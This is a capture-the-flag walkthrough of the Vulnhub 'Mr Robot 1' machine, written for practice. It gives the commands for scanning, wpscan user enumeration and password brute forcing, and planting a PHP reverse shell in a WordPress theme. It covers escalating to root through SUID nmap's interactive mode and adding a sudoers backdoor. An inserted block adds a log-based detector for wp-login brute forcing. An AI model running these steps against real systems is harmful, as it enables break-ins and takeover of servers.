Mr Robot 1

Vulnhub virtual machine; an OSCP prep box, TV-show themed, that offered training on basic enumeration along with wpscan brute forcing, which led to remote code execution. Enumerating kernel exploits for privilege escalation left us empty-handed, but pivoting to another user and using nmap's “interactive” mode led us to root.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use this information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Vulnhub Link: https://www.vulnhub.com/entry/mr-robot-1,151/ File: mrRobot.ova (virtualbox)

Discover VM on network:

netdiscover -r 192.168.56.0/24

Target: 192.168.56.114

Enumeration

Nmap Scan:

nmap -sV -sC -oA nmap/mrrobot 192.168.56.114

Our standard lineup: HTTP and HTTPS web servers along with a closed SSH port.

Navigating to HTTP:

very slick animations - let this education begin.

The same situation occurs over HTTPS. Ok, let's delve down this rabbit hole.

source:

we are not alone apparently - but on our VLAN I can assure you we are.

Join -

hmm, it asked for an email address but I don't have one set up on this box.

Check whether robots.txt exists:

it does. We found our first key.

key acquired.

Moving to download fsocity.dic

moved to the directory and ran file on it:

hmm, an offset with an address is a different twist.

strings fsocity.dic

we now have a large dictionary of passwords.

Passwords to what is the question.

More enumeration: Dirbuster:

wp-login.php - this looks promising.

Navigating to location:

We have potential passwords but no usernames. Our goal should be to enumerate as many usernames as possible.

wpscan

wpscan --enumerate --threads 20 --batch --log --url http://192.168.56.114

a few vulnerabilities, but nothing on the page stands out that will enumerate users.

seeing as this is a theme-based VM, let's refresh our memory of the characters on the show with a quick IMDB lookup:

Back to the WordPress login with an attempt at a generic login.

result:

well, it's returning something at least. Attempting with elliot:

result:

well, elliot is a verified user on the box. Let's move to brute-force this login with wpscan:

wpscan --log --batch --url 192.168.56.114 --wordlist /htb/mrrobot/fsocity.dic --username elliot --threads 20

hmm, we have a lot of passwords to try. I remember seeing a few duplicates in the .dic; let's prune and re-attack.

Sorting duplicates in a file:

wc -l fsocity.dic
858160 fsocity.dic

sort -u fsocity.dic | wc -l
11451

sort -u fsocity.dic > fsocity_sorted.dic

fsocity_sorted.dic created, with quite a few fewer passwords to try.

wpscan brute force again:

wpscan --log --batch --url 192.168.56.114 --wordlist /htb/mrrobot/fsocity_sorted.dic --username elliot --threads 20

we now have elliot credentials!
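As an added defensive counterpart to the wpscan brute force above (example code written for this page, not from the original write-up or from the box): a small Python detector that parses combined-format web server access logs and flags any source that POSTs to wp-login.php more than a threshold number of times inside a sliding one-minute window. The log lines, IPs, timestamps and user-agent strings are constructed placeholders.

```python
# Added example: flag wp-login.php brute forcing in combined-format access logs.
# All sample data below is constructed; addresses and user agents are placeholders.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def detect_wp_login_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: total POSTs} for sources exceeding `threshold` POSTs to
    wp-login.php within any sliding `window`. A successful WordPress login
    answers 302; a 200 on POST is the login form re-rendered with an error."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            attempts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged


# Constructed sample: 15 rapid failed POSTs from one source, one normal login.
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:12:00:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3425 "-" "WPScan v3.8"'
    for s in range(15)
] + ['192.0.2.20 - - [01/Jan/2024:12:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
```

Run against real logs, pair the threshold with rate limiting on wp-login.php and alerting on the user-agent; the page's own attack would also have tripped the user-enumeration check, since the login form answers differently for valid and invalid usernames.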

Login:

we are now inside WordPress. The next move is to upload a payload. The theme is made of PHP pages, so if we take one over with our PHP reverse shell we should be able to initiate a callback.

On the wordpress admin dashboard > Appearance > editor > insert payload under 404.php.

RCE

Setting up listener:

navigate to http://192.168.56.114/404.php

we have captured a shell.

Checking the home folder, we find key-2-of-3.txt alongside a password.raw-md5.

upgrade to tty:

python -c 'import pty; pty.spawn("/bin/bash")'

attempt sudo -l:

yields nothing without the password. Next, moving on to enumerate the box.

uname -a

Quick searchsploit for kernel vulnerabilities:

searchsploit 3.13.0

priv-esc is exactly what we want.

download the exploit to /dev/shm - the in-memory filesystem trick

compile and execute

well, that would have just been too easy. Back to enumeration…

Back to /home/robot/ to check out that password.raw-md5

let's look up the hash:

c3fcd3d76192e4007dfb496cca67e13b = abcdefghijklmnopqrstuvwxyz

thanks to: https://www.md5online.org/md5-decrypt.html

Switching user to robot:

su robot

sudo check:

sudo -l

Priv-esc/Root

Check for SUID:

find / -perm +6000 2> /dev/null

nmap is SUID root. We can take advantage of this through its “interactive” mode:

/usr/local/bin/nmap --interactive

we are now executing commands as root!

Since we have robot's password, we'll just add him to sudoers:

! echo "robot ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers

we can now call an actual shell as root:

sudo /bin/sh

Bring me the root!

-exec